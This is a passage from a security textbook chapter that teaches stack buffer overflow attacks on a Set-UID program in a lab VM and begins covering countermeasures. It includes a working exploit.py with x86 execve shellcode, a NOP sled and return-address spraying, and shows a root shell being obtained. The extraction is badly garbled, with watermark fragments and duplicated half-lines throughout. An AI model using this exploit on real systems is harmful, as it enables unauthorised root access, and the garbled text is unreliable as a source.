Inaccurate Guess –Failed Attack

NOP

NOP

NOPInaccurate Guess –Successful Attack

ebp ebp

Figure 4.6: Using NOP to improve the success rate

By filling the region above the return address with NOP values, we can create multiple

entry points for our malicious code. This is shown on the right side of Figure 4.6. This can be

compared to the case on the left side, where NOP is not utilized and we have only one entry

point for the malicious code.

4.5.3 Finding the Address Without GuessingIn the Set-UID case, since attackers are on the same machine, they can get a copy of the

victim program, do some investigation, and derive the address for the injected code without

a need for guessing. This method may not be applicable for remote attacks, where attackers

try to inject code from a remote machine. Remote attackers may not have a copy of the victim

program; nor can they conduct investigation on the target machine.

We will use a debugging method to find out where the stack frame resides on the stack, and

use that to derive where our code is. We can directly debug the Set-UID program and print

out the value of the frame pointer when the function foo is invoked. It should be noted that

when a privileged Set-UID program is debugged by a normal user, the program will not run

with the privilege, so directly changing the behavior of the program inside the debugger will not

allow us to gain any privilege.

In this experiment, we have the source code of the target program, so we can compile it with

the debugging flag turned on. That will make it more convenient to debug. Here is the gcccommand.

$ gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c

In addition to disabling two countermeasures as before, the above compilation uses the -gflag to compile the program, so debugging information is added to the binary. The compiled

Sam

ple cious code.

n the left side, where left side,

code.e.

the Address Withhe Addresscase, since attackers, since attack

do some investigationome investig

sing. This method maThis method

de from a remote machom a remote mac

can they conduct invehey conduct inve

use a debugging methodebugging m

derive where our codee where our

ue of the frame pointf the frame p

rivilegedd Set-UIDSet-U pr

privilege, so directly clege, so direc

s to gain any privilegegain any priv

this experiment, we haxperiment, w

ebugging flag turnedebugging flag tur

mand.man Scc -z execst

ition to disabon to

e p

Chap

terof our code. This wiur cod

gure 4.6.6

Chap

teppha

ptapapahateteMalicio

Co

w Retuaaapapptptpppptptpt

4.6: Using NOP to im6: Using NOP

rn addr

Page 14: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

76 CHAPTER 4. BUFFER OVERFLOW ATTACK

program (stack dbg) is then debugged using gdb. We need to create a file called badfilebefore running the program. The command "touch badfile" in the following creates an

empty badfile.

$ gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c$ touch badfile$ gdb stack_dbgGNU gdb (Ubuntu 7.11.1-0ubuntu1˜16.04) 7.11.1......(gdb) b foo �Set a break point at function foo()Breakpoint 1 at 0x804848a: file stack.c, line 14.(gdb) run......Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c:1010 strcpy(buffer, str);

In gdb, we set a breakpoint on the foo function using b foo, and then we start executing

the program using run. The program will stop inside the foo function. This is when we can

print out the value of the frame pointer ebp and the address of the buffer using gdb’s pcommand.

(gdb) p $ebp$1 = (void *) 0xbfffeaf8(gdb) p &buffer$2 = (char (*)[100]) 0xbfffea8c(gdb) p/d 0xbfffeaf8 - 0xbfffea8c$3 = 108(gdb) quit

From the above execution results, we can see that the value of the frame pointer is

0xbfffeaf8. Therefore, based on Figure 4.6, we can tell that the return address is stored in

0xbfffeaf8 + 4, and the first address that we can jump to 0xbfffeaf8 + 8 (the mem-

ory regions starting from this address is filled with NOPs). Therefore, we can put 0xbfffeaf8+ 8 inside the return address field.

Inside the input, where is the return address field? Since our input will be copied to the

buffer starting from its beginning. We need to know where the buffer starts in the memory, and

what the distance is between the buffer’s starting point and the return address field. From the

above debugging results, we can easily print out the address of buffer, and then calculate the

distance between ebp and the buffer’s starting address. We get 108. Since the return address

field is 4 bytes above where ebp points to, the distance is 112.

4.5.4 Constructing the Input FileWe can now construct the contents for badfile. Figure 4.7 illustrates the structure of the

input file (i.e. badfile). Since badfile contains binary data that are difficult to type using

a text editor, we write a Python program (called exploit.py) to generate the file. The code

is shown below.

Listing 4.2: Generating malicious input (exploit.py)

#!/usr/bin/python3import sys

Sam

pleee can see that the valuee that the

4.6, we can tell that th4.6, we can tell th

hat we can jump toat we can jum 0xed with NOPs). Therefh NOPs). Th

n address field? Sincedress field? S

need to know where tho know whe

er’s starting point andstarting point and

ily print out the addrerint out the a

er’s starting address. Wtarting ad

oints to, the distance ito, the dista

Input Fileut Filentents fors f badfilebadf .

nce badfiledfile containco

hon program (calledhon program (call e

4.2: Generating mal.2: GeneratingSCh

apte

rle calledalled badfilefollowing creates anwing createestackteteptptpn foo()papapa.c:10 ab foooo, and then we s, and then

e fooo function. This ifunction. T

ddress of thedress of t bufferCCCCC

Page 15: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.5. CONDUCT BUFFER-OVERFLOW ATTACK 77

0xbfffea8c

0xbfffeaf8 + 8

Figure 4.7: The structure of badfile

shellcode= ("\x31\xc0" # xorl %eax,%eax"\x50" # pushl %eax"\x68""//sh" # pushl $0x68732f2f"\x68""/bin" # pushl $0x6e69622f"\x89\xe3" # movl %esp,%ebx"\x50" # pushl %eax"\x53" # pushl %ebx"\x89\xe1" # movl %esp,%ecx"\x99" # cdq"\xb0\x0b" # movb $0x0b,%al"\xcd\x80" # int $0x80

).encode(’latin-1’)

# Fill the content with NOPscontent = bytearray(0x90 for i in range(300)) �

# Put the shellcode at the endstart = 300 - len(shellcode)content[start:] = shellcode �

# Put the address at offset 112ret = 0xbfffeaf8 + 120 �

content[112:116] = (ret).to_bytes(4,byteorder=’little’) �

# Write the content to a filewith open(’badfile’, ’wb’) as f:f.write(content)

In the given code, the array shellcode[] contains a copy of the malicious code. We will

discuss how to write such code later. In Line �, we create an array of size 300 bytes, and fill it

with 0x90 (NOP). We then place the shellcode at the end of this array (Line �).

Sam

pleee #e# mle#leplpl’) pnt with N

mpay(0x90 f

mp

lcode atm- len(smt:] = she

amress atamfffeaf8a12:116] =

Sa

te the conte

Sah open(’badS.write(conte

In the given code, thn the given cod

w to write sto w

W

Chap

ter

tpptptptptptpppppttt

fffeaf8 + 8af8 + 8

e 4.7: The structure ofe 4.7: The structu

CClCshlC# pushC

Page 16: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

78 CHAPTER 4. BUFFER OVERFLOW ATTACK

We plan to use 0xbfffeaf8 + 100 for the return address (Line �), so we need to put

this value into the corresponding place inside the array. According to our gdb result, the return

address field starts from offset 112, and ends at offset 116 (not including 116). Therefore, in

Line �, we put the address into content[112:116]. When we put a multi-byte number

into memory, we need to consider which byte should be put into the low address. This is called

byte order. Some computer architecture use big endian, and some use little endian. The x86

architecture uses the little-endian order, so in Python, when putting a 4-byte address into the

memory, we need to use byteorder=’little’ to specify the byte order .

It should be noted that in Line �, we did not use 0xbfffeaf8 + 8, as we have calculated

before; instead, we use a larger value 0xbfffeaf8 + 120. There is a reason for this: the

address 0xbfffeaf8 was identified using the debugging method, and the stack frame of the

foo function may be different when the program runs inside gdb as opposed to running directly,

because gdb may push some additional data onto the stack at the beginning, causing the stack

frame to be allocated deeper than it would be when the program runs directly. Therefore, the

first address that we can jump to may be higher than 0xbfffeaf8 + 8. That is why we

chose to use 0xbfffeaf8 + 120. Readers can try different offsets if their attacks fail.

Another important thing to remember is that the result of 0xbfffeaf8 + nnn should

not contain a zero in any of its byte, or the content of badfile will have a zero in the middle,

causing the strcpy() function to end the copying earlier, without copying anything after the

zero. For example, if we use 0xbfffeaf8 + 8, we will get 0xbfffeb00, and the last byte

of the result is zero.

Run the exploit. We can now run exploit.py to generate badfile. Once the file

is constructed, we run the vulnerable Set-UID program, which copies the contents from

badfile, resulting in a buffer overflow. The following result shows that we have successfully

obtained the root privilege: we get the # prompt, and the result of the id command shows that

the effective user id (euid) of the process is 0.

$ chmod u+x exploit.py �make it executable$ rm badfile$ exploit.py$ ./stack# id �Got the root shell!uid=1000(seed) gid=1000(seed) euid=0(root) groups=0(root), ...

Note for Ubuntu16.04 VM: If the above experiment is conducted in the provided SEED

Ubuntu16.04 VM, we will only get a normal shell, not a root shell. This is due to a counter-

measure implemented in Ubuntu16.04. In both Ubuntu12.04 and Ubuntu16.04 VMs,

/bin/sh is actually a symbolic link pointing to the /bin/dash shell. However, the dashshell (bash also) in Ubuntu16.04 has a countermeasure that prevents itself from being

executed in a Set-UID process. We have already provided a detailed explanation in Chapter 1

(§1.5).

There are two choices to solve this problem. The first choice is to link /bin/sh to another

shell that does not have such a countermeasure. We have installed a shell program called zshin our Ubuntu16.04 VM. We can use the following command to link /bin/sh to zsh:

$ sudo ln -sf /bin/zsh /bin/shSam

ple

D pro

ollowing resulting res

pt, and the result of thnd the result

0. leke it execut

plplppm

p0(root)

f the above experimenabove exper

y get a normal shell, noa normal she

u16.0404. In both. In bot Ubuc link pointing to thek pointing to

16.0404 has a counterhas a co

ess. We have already pWe have alrea

o solve this problem. Tsolve this prob

ch a countermeasure.ch a countermea

M. We can use the folM. We can use thSn/sh

Chap

ter), so we need to putwe n

gdb result, the returnsult, the re

ng 116). Therefore, in16). Therefor

ut a multi-byte numbemulti-byte n

w address. This is callress. This is

use little endian. Thee little endian.

g a 4-byte address into4-byte addres

byte order .order .

+ 88, as we have cal, as we ha

There is a reason for te is a reason

hod, and the stack framnd the stack

db as opposed to runninopposed to runnin

t the beginning, causinbeginning, c

gram runs directly. Thruns directl

bfffeaf8 + 8+ 8. Th

ferent offsets if their att offsets if th

ult ofult of 0xbfffeaf80xbfffeaadfilele will have a zewill hav

rlier, without copyingrlier, without copy

will getwi 0xbfffeb0bff

nerate badco

Page 17: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.6. ATTACKS WITH UNKNOWN ADDRESS AND BUFFER SIZE 79

A better choice is to modify our shellcode, so instead of invoking /bin/sh, we can directly

invoke /bin/zsh. To do that, simply make the following change in the shellcode:

change "\x68""//sh" to "\x68""/zsh"

It should be noted that this countermeasure implemented by bash and dash can be defeated.

Therefore, even if we cannot use zsh in our experiment, we can still get a root shell. We need

to add a few more instructions to the beginning of the shellcode. We will talk about this in §4.7.

4.6 Attacks with Unknown Address and Buffer SizeIn the previous section, we show how to conduct attacks when the buffer address and size are

known to us. In real-world situations, we may not be able to know their exact values. This is

especially true for attacks against remote servers, because unlike what we did in the previous

section, we will not be able to debug the target program. In this section, we will learn a few

techniques that allow us to launch attacks without knowing all the information about the target

program.

4.6.1 Knowing the Range of Buffer SizeThere are two critical pieces of information for buffer overflow attacks: the buffer’s address and

size. Let us first assume that we do know the address of the buffer is A = 0xbfffea8c (this

assumption will be lifted later), but we do not know exactly what the buffer size is; we only

know it is in a range, from 10 to 100. Obviously, we can use the brute force approach, trying

all the values between 10 to 100. The question is whether we can do it with only one try. In

real-world situations, brute-force attacks can easily trigger alarms, so the less we try the better.

The buffer size decides where the return address is. Without knowing the actual buffer size,

we do not know which area in the input string (i.e., the badfile) should be used to hold the

return address. Guessing is an approach, but there is a better solution: instead of putting the

return address in one location, we put it in all the possible locations, so it does not matter which

one is the actual location. This technique is called spraying, i.e., we spray the buffer with the

return address.

Since the range of the buffer size is between 10 to 100, the actual distance between the

return address field and the beginning of the buffer will be at most 100 plus some small value

(compilers may add additional space after the end of the buffer); let us use 120. If we spray

the first 120 bytes of the buffer with the return address RT (four bytes for each address), we

guarantee that one of them will overwrite the actual return address field. Figure 4.8 shows what

the badfile content looks like.

We do need to decide the value for RT. From the figure, we can see that the first NOPinstruction will be at address A + 120. Since we assume that A is known to us (its vale is

0xbfffea8c), we have A + 120 = 0xbfffea8c + 120 = 0xbfffeb04. We can

use this address for RT. Actually, because of the NOPs, any address between this value and the

starting of the malicious code can be used.

4.6.2 Knowing the Range of the Buffer AddressLet us lift the assumption on the buffer address; assume that we do not know the exact value

of the buffer address, but we know its range is between A and A+100 (A is known). Our

Sam

ple

m 10

0 to 100. The

rute-force attacks canforce attack

cides where the returnwhere the re

ch area in the input strh area in the inpu

ssing is an approach,sing is an app

ne location, we put it ination, we pu

ocation. This techniquion. This te

ange of the buffer sizeof the buffer

field and the beginnind and the beginnin

ay add additional spadd additional

bytes of the buffer wes of the

hat one of them will ovne of them w

ile content looks likeconten

o need to decide thedecide

on will be at addresswill be at add

fea8c8c), we havewe hav Ais address foress for RTRT. Act

ng of the malicious cong of the malicio

6.2 Knowing th.2 Knowingthe assumphe ass

ess

Chap

terstead of invokingof in /b

ollowing change in thng changeemplemented byemented by bashbexperiment, we can stixperiment, we

ng of the shellcode. Wthe shellcod

wn Address andAddress ato conduct attacks whonduct attacks wh

, we may not be ablemay not be a

mote servers, becauseservers, bec

ug the target programe target prog

attacks without knowiks without k

nge of Buffer Sizenge of Buffeof information for bufff information for

we do know the addre do know the a

ut we do not kut we do

iousl

Page 18: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

80 CHAPTER 4. BUFFER OVERFLOW ATTACK

0xbfffea8c

0xbfffea8c + 120

Figure 4.8: Spraying the buffer with return addresses.

assumption on the buffer size is still the same, i.e., we know its range is between 10 to 100. We

would like to construct one payload, so regardless of what the buffer address is, as long as it is

within the specified range, our payload can successfully exploit the vulnerability.

We still use the spraying technique to construct the first 120 bytes of the buffer, and we put

150 bytes of NOP afterward, followed by the malicious code. Therefore, if the buffer’s address

is X, the NOP section will be in the range of [X + 120, X + 270]. The question is that

we do not know X, and hence we do not know the exact range for the NOP section. Since X is

in the range of [A, A + 100], let us enumerate all the possible values for X, and see where

their NOP sections are:

Buffer Address NOP Section--------------------------------------

A [A + 120, A + 270]A+4 [A + 124, A + 274]A+8 [A + 128, A + 278]

......A+100 [A + 220, A + 370]

To find a NOP that works for all the possible buffer addresses, the NOP must be in the

conjunction of all the NOP sections shown above. That will be [A + 220, A + 270].

Namely, any address in this range can be used for the return address RT.

4.6.3 A General SolutionLet us generalize what we have just discussed regarding the return address value that can be

used in the attack. Assume that the buffer address is within the range of [A, A + H], the first

S bytes of the buffer are used for the spraying purpose (the RT section), and the next L bytes of

the buffer are filled with the NOP instruction (the NOP section). Let us find out what values we

can use for the return address RT (see Figure 4.9).

Sam

ple

uct the

alicious code. Tus cod

X + 120, X + 2+ 120, Xw the exact range for thexact range

merate all the possiblemerate all the poss

plp- p0]

mp

mp278]

mm+ 370]

r all the possible buffthe poss

tions shown above. Tshown abov

ge can be used for thean be used fo

tiononhave just discussed rhave just discus

e that the buffer addresthat the buffer ad

sed for the spraying pd for the sprayi

instruction (struc

ure

Chap

ter

ptptptppptapapth return addresses.h return addresse

e know its range is beknow its range i

f what the buffer addhat the buffer

ploit the vulnl it th

es o

Page 19: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.6. ATTACKS WITH UNKNOWN ADDRESS AND BUFFER SIZE 81

• If the buffer’s actual starting address is X = A, the NOP section’s range will be [A +S, A + S + L]. Any number in this range can be used for RT.

• If the buffer’s actual starting address is X = A + 4, the NOP section’s range will be

[(A + 4) + S , (A + 4) + S + L]. Any number in this range can be used for

RT.

• If the buffer’s actual starting address is X = A + H, the NOP section’s range will be

[(A + H) + S , (A + H) + S + L]. Any number in this range can be used for

RT.

Figure 4.9: Find values for the return address RT

If we want to find an RT value that works for all the possible buffer addresses, it must be in

the conjunction of all the ranges for X = A, A+4, ..., A+H. From Figure 4.9, we can see that

the conjunction is [A + H + S, A + S + L). Any number in this range can be used for

the return address RT.

Some readers may immediately find out that if H is larger than L, the lower bound of the

above range is larger than the upper bound, so the range is impossible, and no value for RT can

satisfy all the buffer addresses. Intuitively speaking, if the range of the buffer address is too

large, but the space for us to put NOP instructions is too small, we will not be able to find a

solution. To have at least one solution, the relationship H < L must hold.

Since L is decided by the payload size, which depends on how many bytes the vulnerable

program can take from us, we will not be able to arbitrarily increase L to satisfy the inequality.

Sam

ple ee

p

Figure 4.9:Fi

want to find anto find RT valu

unction of all the rangn of all the

unction ision is [A + H +[A +urn addressddress RTR .

ome readers may immaders may

e range is larger than te range is larger t

sfy all the buffer addrsfy all the buffe

ge, but the space fore, but the space

lution. To have at leaion. To have a

L is decidedis de

fro

Chap

terA, thethe NOP section

ge can be used forbe used fo RT

= A + 4A + 4, theth NOP+ L]. Any number in. Any numb

is X = A + H= A + H, the,

S + L]L]. Any numbe. Any n

ahhhahahaahaahhaChCp

C

Page 20: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

82 CHAPTER 4. BUFFER OVERFLOW ATTACK

Obviously, we cannot reduce the width H of the specified range for the buffer address. but we

can break the range into smaller subranges, each of which has a smaller width H’. As long as

H’ is less than L, we can find a solution. Basically, if the range is too wide, we break it into

smaller subranges, and then construct a malicious payload for each of the subranges.

4.7 Writing a ShellcodeUp to this point, we have learned how to inject malicious code into the victim program’s memory,

and how to trigger the code. What we have not discussed is how to write such malicious code.

If an attacker is given a chance to get the victim program to run one command, what command

should he/she run? Let me ask a different question: if Genie grants you (instead of Aladdin) a

wish, what wish would you make? My wish would be “allowing me to make unlimited number

of wishes whenever I want”.

Similarly, the ideal command that attackers want to inject is one that allows them to run

more commands whenever they want. One command can achieve that goal. That is the shell

program. If we can inject code to execute a shell program (e.g. /bin/sh), we can get a shell

prompt, and can later type whatever commands we want to run.

4.7.1 Writing Malicious Code Using CLet us write such code using C. The following code executes a shell program (/bin/sh) using

the execve() system call.

#include <stddef.h>void main(){

char *name[2];name[0] = "/bin/sh";name[1] = NULL;execve(name[0], name, NULL);

}

A naive thought is to compile the above code into binary, and then save it to the input

file badfile. We then set the targeted return address field to the address of the main()function, so when the vulnerable program returns, it jumps to the entrance of the above code.

Unfortunately this does not work for several reasons.

• The loader issue: Before a normal program runs, it needs to be loaded into memory and

its running environment needs to be set up. These jobs are conducted by the OS loader,

which is responsible for setting up the memory (such as stack and heap), copying the

program into memory, invoking the dynamic linker to link to the needed library functions,

etc. After all the initialization is done, the main() function will be triggered. If any of

the steps is missing, the program will not be able to run correctly. In a buffer overflow

attack, the malicious code is not loaded by the OS; it is loaded directly via memory copy.

Therefore, all the essential initialization steps are missing; even if we can jump to the

main() function, we will not be able to get the shell program to run.

• Zeros in the code: String copying (e.g. using strcpy()) will stop when a zero is found

in the source string. When we compile the above C code into binary, at least three zeros

will exist in the binary code:

Sam

pee eeleple

plabove code into binare code into

ted return address fielturn address

gram returns, it jumpsreturns, it jumps

several reasons.ral reasons.

ormal program runs, itl program ru

eds to be set up. Theseo be set up. T

etting up the memoryup the me

oking the dynamic linkg the dynamic

ation is done, then is done, the maie program will not begram will no

ode is not loaded by thde is not loaded b

ential initialization stential initializa

we will not be able to ge will not be abl

String copying (e.g. ung copying (e.

we compilee com

Chap

terffer address. but weaddre

width H’’. As long as. As lon

wide, we break it into, we break it

he subranges.ubrange

he victim program’s mctim progr

to write such maliciourite such ma

one command, what command, wh

rants you (instead of Ayou (instead of A

ng me to make unlimitme to make un

ject is one that allowsone that al

n achieve that goal. Thieve that go

m (e.g.m (e.g. /bin/sh/bin/sh), we)

to run.to run.

executes a shell prograecutes a shell prC

Page 21: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.7. WRITING A SHELLCODE 83

– There is a '\0' at the end of the "/bin/sh" string.

– There are two NULL’s, which are zeros.

– Whether the zeros in name[0] will become zeros in the binary code depends on

the program compilation.

4.7.2 Writing a Shellcode: Main IdeaGiven the above issues, we cannot use the binary generated directly from a C program as our

malicious code. It is better to write the program directly using the assembly language. The

assembly code for launching a shell is referred to as shellcode [Wikipedia, 2017t]. The core part

of a shellcode is to use the execve() system call to execute "/bin/sh". To use the system

call, we need to set four registers as follows:

• %eax: must contain 11, which is the system call number for execve().

• %ebx: must contain the address of the command string (e.g. "/bin/sh").

• %ecx: must contain the address of the argument array; in our case, the first element of

the array points to the "/bin/sh" string, while the second element is 0 (which marks

the end of the array).

• %edx: must contain the address of the environment variables that we want to pass to the

new program. We can set it to 0, as we do not need to pass any environment variable.

Setting these four registers are not difficult; the difficulty is in preparing the data, finding the

addresses of those data, and making sure that there is no zero in the binary code. For example,

to set the value for %ebx, we need to know the address of the "/bin/sh" string. We can

put the string on the stack using the buffer overflow, but we may not be able to know its exact

memory address. To eliminate the guessing involved in finding the address, a common idea is to

use the stack pointer (the %esp register), as long as we can figure out the offset of the string

from the current stack pointer’s position. To achieve this goal, instead of copying the string to

the stack via a buffer overflow, we can dynamically push the string into the stack; this way, we

can get its address from the %esp register, which always points to the top of the stack.

To ensure that the entire code is copied into the target buffer, it is important not to include

any zero in the code, because some functions treat zero as the end of the source buffer. Although

zeros are used by the program, we do not need to have zeros in the code; instead, we can

generate zeros dynamically. There are many ways to generate zeros. For example, to place a

zero in the %eax register, we can use the mov instruction to put a zero in it, but that will cause

zero to appear in the code. An alternative is to use "xorl %eax, %eax", which XORs the

register with itself, causing its content to become zero.

4.7.3 Explanation of a Shellcode ExampleThere are many ways to write a shellcode, more details about shellcode writing can be found

in [One, 1996] and many online articles. We use a shellcode example to illustrate one way to

write such code. The code is shown below. We have already placed the machine instructions

into a string in the following Python code, and the comment fields show the assembly code for

each machine instruction.

Sam

ple isters are not

and making sure thamaking su

ebx, we need to knowwe need to

stack using the buffertack using the bu

eliminate the guessingeliminate the gu

er (the %esp%esp register)reg

tack pointer’s positionpointer’s p

uffer overflow, we canoverflow, we

ess from theom the %esp%esp reg

hat the entire code ishe entire code is

e code, because some fe, because so

ed by the program, wy the p

ros dynamically. Theynamically.

%eaxax register, we caregis

ppear in the code. Ann the code

with itself, causing itsitself, causin

3 Explanation ofExplanatiore are many ways to wre are many way

[One, 1996] and manOne, 1996] and

rite such code. The ce such code. T

ng in the follin th

ruc

Chap

tern/sh"h" string.

os.

l become zeros in theome zeros i

Ideaabinary generated direary generat

program directly usinram directly

ferred to asto as shellcodeshellco [

system call to executeem call to execute

ollows:s:

ch is the system call nusystem ca

dress of the commanddress of the comm

address of the argumeddress of the arg

/bin/sh"/bin/sh" string, whstr

he address of the enviraddress of the

to 0, as we doto 0 as w

Page 22: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

84 CHAPTER 4. BUFFER OVERFLOW ATTACK

Listing 4.3: Shellcode

shellcode= ("\x31\xc0" # xorl %eax,%eax"\x50" # pushl %eax"\x68""//sh" # pushl $0x68732f2f"\x68""/bin" # pushl $0x6e69622f"\x89\xe3" # movl %esp,%ebx �set %ebx"\x50" # pushl %eax"\x53" # pushl %ebx"\x89\xe1" # movl %esp,%ecx �set %ecx"\x99" # cdq �set %edx"\xb0\x0b" # movb $0x0b,%al �set %eax"\xcd\x80" # int $0x80 �invoke execve()

).encode(’latin-1’)

The goal of the above code is similar to the C program shown before, i.e. to use the

execve() system call to run /bin/sh. A system call is executed using the instruction "int$0x80" (the last instruction in the shellcode above). To run it, parameters need to be prepared

for registers %eax, %ebx, %ecx, and %edx. If these registers are configured correctly and the

"int $0x80" instruction is executed, the system call execve() will be executed to launch

a shell. If the program runs with the root privilege, a root shell will be obtained.

Before diving into the details of the above shellcode, we need to know the current state

of the stack before the shellcode gets executed. Figure 4.10(a) shows the stack state before

the vulnerable function returns. During the return, the return address will be popped out from

the stack, so the esp value will advance four bytes. The updated stack state is depicted in

Figure 4.10(b).

Stack

MaliciousCode

New Return Address

NOP

NOP

NOP

esp

MaliciousCode

NOP

NOP

NOP

esp

(a) Before return (b) After return

Figure 4.10: The positions of the stack pointer before and after function returns

We will now go over the above shellcode, line by line, to understand how it overcomes the

challenges mentioned previously. The code can be divided into four steps.

Step 1: Finding the address of the "/bin/sh" string and set %ebx. To get the address

of the "/bin/sh" string, we push this string to the stack. Since the stack grows from high

Saae

y

ampl

emmmmmmm

pppple

pe

ple

ppp

esp

rn

ions of the stack pointof the stack

e above shellcode, linee above shellco

viously. The code caniously. The code

thee "/bin/"/bstri

Chap

terereretetete%ebx

ptptp%e p%edx

apxapnvoke execve()aram shown before, i.ehown before

executed using the inscuted using th

run it, parameters needrun it, parameters

gisters are configureders are confi

execve()execve() will be ewill

root shell will be obtaioot shell will be

lcode, we need to knocode, we need t

igure 4.10(a) shows ture 4.10(a) sho

eturn address witurn addre

ated sta

Page 23: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

4.7. WRITING A SHELLCODE 85

address to low address, and we can only push four bytes at a time, we need to divide the string

into 3 pieces, 4 bytes each, and we push the last piece first. Let us look at the code.

• xorl %eax,%eax: Using XOR operation on %eax will set %eax to zero, without

introducing a zero in the code.

• pushl %eax: Push a zero into the stack. This zero marks the end of the "/bin/sh"string.

• pushl $0x68732f2f: Push "//sh" into the stack (double slash // is used because

4 bytes are needed for instruction; double slashes will be treated by the execve()system call as the same as a single slash). As we have mentioned before, if we would

like to directly invoke /bin/zsh, instead of invoking /bin/sh, we can simply change

"//sh" to "/zsh" at this line of shellcode. The assembly code will become pushl$0x68737a2f.

• pushl $0x6e69622f: Push "/bin" into the stack. At this point, the entire string

"/bin//sh" is on the stack, and the current stack pointer %esp, which always points

to the top of the stack, now points to the beginning of the string. The state of the stack

and the registers at this point is shown in Figure 4.11(a).

• movl %esp,%ebx: Move %esp to %ebx. That is how we save the address of the

string to the %ebx register without doing any guessing.

MaliciousCode

NOP

NOP

NOP

esp

0

//sh

/bin

eax

ebx

ecx

edx00

0x2000

0x2000

11

MaliciousCode

NOP

NOP

NOP

esp

0

//sh

/bin

ebx

(a) Set the ebx register (b) Set the eax, ecx, and edx registers

Figure 4.11: Shellcode Execution

Step 2. Finding the address of the name[] array and set %ecx. The next step is to find the

address of the name[] array, which needs to contain two elements, the address of "/bin/sh"for name[0] and 0 for name[1]. We will use the same technique to get the address of the

array. Namely, we dynamically construct the array on the stack, and then use the stack pointer

to get the array’s address.

Samm

ple

mpl

epl

em

ppleees

P

plplleleOP

NOP

ppm

pm

p0

//sh ppp

(a) Set

p 2. Finding the addrp 2. Finding thedress of theress of the name[]me a

name[0]ame[0] and 0 foand

mely, we dynely w

dd

Chap

terbytes at a time, we ns at a

iece first. Let us lookst. Let us l

tion onon %eaxeax will sew

ack. This zero marksk. This zero m

/sh"" into the stack (dinto the sta

n; double slashes willuble slashes

le slash). As we have. As we hav

h, instead of invokingstead of invoking

e of shellcode. The asshellcode. Th

ush "/bin""/bin" into theint

ck, and the current stack, and the curren

w points to the beginnpoints to the

oint is shown in Figuroint is shown in F

MoveMo %esp too %ebx%ister without doing anter without doinC

Page 24: Buffer Overflow Attack wAttack Attack · or give extra space for this region [Bryant and O’Hallaron, 2015]. Programmers should not assume any particular order or size for this

86 CHAPTER 4. BUFFER OVERFLOW ATTACK

• pushl %eax: Construct the second item of the name array. Since this item contains a

zero, we simply push %eax to this position, because the content of %eax is still zero.

• pushl %ebx: Push %ebx, which contains the address of the "/bin/sh" string, into

the stack, forming the first entry of the name array. At this point, the entire name array

is constructed on the stack, and %esp points at the beginning of this array.

• movl %esp,%ecx: Save the value of %esp to %ecx, so now the %ecx register con-

tains the address of the name[] array. See Figure 4.11(b).

Step 3. Setting %edx to zero. The %edx register needs to be set to zero. We can use the

XOR approach, but in order to reduce the code size by one byte, we can leverage a different

instruction (cdq). This one-byte instruction sets %edx to zero as a side effect. It basically

copies the sign bit (bit 31) of the value in %eax (which is 0 now), into every bit position in

%edx.

Step 4. Invoking the execve() system call. Two instructions are needed for invoking

a system call. The first instruction is to save the system call number in the %eax register.

The system call number for the execve() system call is 11 (0x0b in hex). The "movb$0x0b,%al" instruction sets %al to 11 (%al represents the lower 8 bits of the %eax register,

the other bits of which has already been set to zero due to the xor instruction in the beginning).

The "int $0x80" instruction executes the system call. The int instruction means

interrupt. An interrupt transfers the program flow to the interrupt handler. In Linux, the

"int $0x80" interrupt triggers a switch to the kernel mode, and executes the corresponding

interrupt handler, namely, the system call handler. This mechanism is used to make system

calls. Figure 4.11(b) shows the final state of the stack and the registers before the system call is

invoked.

4.8 Countermeasures: OverviewThe buffer overflow problem has quite a long history, and many countermeasures have been

proposed, some of which have been adopted in real-world systems and software. These coun-

termeasures can be deployed in various places, from hardware architecture, operating system,

compiler, library, to the application itself. We first give an overview of these countermea-

sures, and then study some of them in depth. We will also demonstrate that some of the

countermeasures can be defeated.

Safer Functions. Some of the memory copy functions rely on certain special characters in the

data to decide whether the copy should end or not. This is dangerous, because the length of the

data that can be copied is now decided by the data, which may be controlled by users. A safer

approach is to put the control in the developers’ hands, by specifying the length in the code. The

length can now be decided based on the size of the target buffer, instead of on the data.

For memory copy functions like strcpy, sprintf, strcat, and gets, their safer

versions are strncpy, snprintf, strncat, fgets, respectively. The difference is that

the safer versions require developers to explicitly specify the maximum length of the data

that can be copied into the target buffer, forcing the developers to think about the buffer size.

Obviously, these safer functions are only relatively safer, as they only make a buffer overflow

Sam

ple

ker

dler. This me

e stack and the registeck and the r

erviewewa long history, and mag history, an

opted in real-world syd in real-worl

us places, from hardwaces, from hardw

itself. We first givef. We first give

m in depth. We willdepth. We

memory copy functionory copy fun

should end or not. Thuld end or no

decided by the data, wded by the d

in the developers’ handevelopers’

based on the size of theased on the size o

ctions likections like strcpystr ,

nprintfnprintf, strncattrne developers to explidevelopers to e

buffer, forcuffer

rel

Chap

terthis item contains aitem

%eax is still zero.is still zer

/bin/sh"n/sh" string, inttrin

nt, the entireentire nameame arr

of this array.f this array.

now thehe %ecx%ecx registerreg

be set to zero. We canto zero. We

yte, we can leverage awe can leverage a

ero as a side effect. Ias a side effe

0 now), into every biw), into eve

instructions are neednstructions are n

em call number in thall number

call iscall is 11 ((0x0b0x0b in h

sents the lower 8 bits oents the lower 8

ue to thee to xor instructinst

system call. Thestem call. The inhe interrupt hhe interru

d exe

